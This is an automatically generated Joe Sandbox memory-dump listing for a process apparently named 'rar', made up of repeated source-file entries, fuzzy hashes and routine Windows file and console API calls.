                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: FileHandleType
                                                        • String ID: @
                                                        • API String ID: 3000768030-2766056989
                                                        • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                        • Instruction ID: 73c98057e3716bdc64801e3299307836a8900126dc9554537cce34044da82aa3
                                                        • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                        • Instruction Fuzzy Hash: 9021E52AA2874340EB609B249490039A766FB45774F6A1737DA7F077D4CE3CE883C392
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                        • String ID: CreateThread failed
                                                        • API String ID: 1217111108-3849766595
                                                        • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                        • Instruction ID: fd6fb3dc78ee63b55f7d162ed3b5034a351fb176f9029c6f8bd737ddfd5f0692
                                                        • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                        • Instruction Fuzzy Hash: 5611603A908A4282E705FB21E8401BAB370FB84794FD44033D6AE036A9DF7CE547C7A0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterEventLeave
                                                        • String ID:
                                                        • API String ID: 3094578987-0
                                                        • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                        • Instruction ID: 9e66d2c9e77d18b27624825f13e9f5e41579e0e4546f4a7d4171a67a3c2bca1d
                                                        • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                        • Instruction Fuzzy Hash: 28F0672D508A4582EB20AF11F9440B9B360FB89B99F844132DEBE066A9CF2CD556CB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                        • Instruction ID: 69a8403ba2a1db41cbfbf82bf917a06765eb8722b7d77d92776738cc1358d22a
                                                        • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                        • Instruction Fuzzy Hash: BBE01A28A08B0542FB44BF209C813B963566F84741F85583ACC2F023D2CE3DA40A83A2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ConsoleFileHandleModeType
                                                        • String ID:
                                                        • API String ID: 4141822043-0
                                                        • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                        • Instruction ID: 024e1fa16180b56348d8dbffc7d292ce9b1404754d3ec55b3f5512ffa217a4b7
                                                        • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                        • Instruction Fuzzy Hash: BBE08C2CF0660242EB586721A8652B883629F5DB90FC01036D83F4ABD0EE2C949A8360
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CharEnvironmentExpandStrings
                                                        • String ID:
                                                        • API String ID: 4052775200-0
                                                        • Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                        • Instruction ID: 189e67b214cf7d33b81549ce9c397ec790235da666919d89befcd82cdaa61995
                                                        • Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                        • Instruction Fuzzy Hash: 5AE1C42AE1868285FB30AB6894401BDE7A0FB52794F944132DBAE076D9DF7CD44BC790
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF7F7E97EBE,00000000,00000000,00000000,00000000,00000007,00007FF7F7E97C48), ref: 00007FF7F7EA1B8D
                                                        • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF7F7E97EBE,00000000,00000000,00000000,00000000,00000007,00007FF7F7E97C48), ref: 00007FF7F7EA1BD7
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                        • Instruction ID: 3ba38f9bde00dbdb8e1f22fd35cbf4ea691e696af0af0440ad996cede42720af
                                                        • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                        • Instruction Fuzzy Hash: 09315967A1874186F770AF14E4053A9A7A0EB41BB8F904336DD7D066C5DF7CC586C790
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                        • String ID:
                                                        • API String ID: 932687459-0
                                                        • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                        • Instruction ID: 356f2b2e013e2d26a6348510eb45caf1af566d8720d57ca9131b44afc79b148e
                                                        • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                        • Instruction Fuzzy Hash: 31218457908E8582DB019F29D5410B86360FB98B88B58A321DF5D43757EF38E5E6C350
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 302f4e927f3bd5b43f1168eb9d42450f56f5141e75014634f46cae096db8b2c1
                                                        • Instruction ID: 5c1f22a051e7288b93212ce11202f8e6d79c482950586292d107c35d7b95d436
                                                        • Opcode Fuzzy Hash: 302f4e927f3bd5b43f1168eb9d42450f56f5141e75014634f46cae096db8b2c1
                                                        • Instruction Fuzzy Hash: E011E935609B8181EB10FB68E5443A9F3A4EF85794F940236D6BE073E6DE7CD452C360
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                        • Instruction ID: ad5a7f8389f92190dc24f1d25eb559aa84fabaea883b182e1e08c9366c537812
                                                        • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                        • Instruction Fuzzy Hash: 09012929B1968141FB646B25A800069E365EF94BF0F949232DE3F03FD0CF3CD4429750
                                                        APIs
                                                        • setbuf.LIBCMT ref: 00007FF7F7E97A7B
                                                          • Part of subcall function 00007FF7F7EE2AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE7EF3
                                                        • setbuf.LIBCMT ref: 00007FF7F7E97A8F
                                                          • Part of subcall function 00007FF7F7E97B44: GetStdHandle.KERNEL32(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B4A
                                                          • Part of subcall function 00007FF7F7E97B44: GetFileType.KERNELBASE(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B56
                                                          • Part of subcall function 00007FF7F7E97B44: GetConsoleMode.KERNEL32(?,?,?,00007FF7F7E97A9E), ref: 00007FF7F7E97B69
                                                          • Part of subcall function 00007FF7F7EE2ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE2AD0
                                                          • Part of subcall function 00007FF7F7EE2B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE2C1C
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                        • String ID:
                                                        • API String ID: 4044681568-0
                                                        • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                        • Instruction ID: bac26f6d6550a72cf2d4e0571268a0bac43023dbaf3d377c9e152d3589d6c440
                                                        • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                        • Instruction Fuzzy Hash: FB011708E1958205FB18B7B514663B9968A4F95360FC1893AE03F0A3D3ED5C245783F6
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                        • Instruction ID: d077da79237af0fdb191281338d1e0e6f81dae7a8c47e686e33467ef4c521ab6
                                                        • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                        • Instruction Fuzzy Hash: 4201A126A18A4281FB64BB39E4402B8A360EB80778F944332D53E015E5CF7CD587C7A0
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000800,00007FF7F7EA305D,?,?,?,?,?,?,?,?,00007FF7F7EB4126,?,?,?,?,00000800), ref: 00007FF7F7EA30F0
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7F7EB4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7F7EA3119
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                        • Instruction ID: cf863b22eb429de75f3ff621d3e6b0aededdc7f66ea81419ff8f3a8452d753b7
                                                        • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                        • Instruction Fuzzy Hash: 6CF0A429B18A8181EB60AB64F4843A9A390BB4D7D4FC00132E9BE837D5DE6CD5464650
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
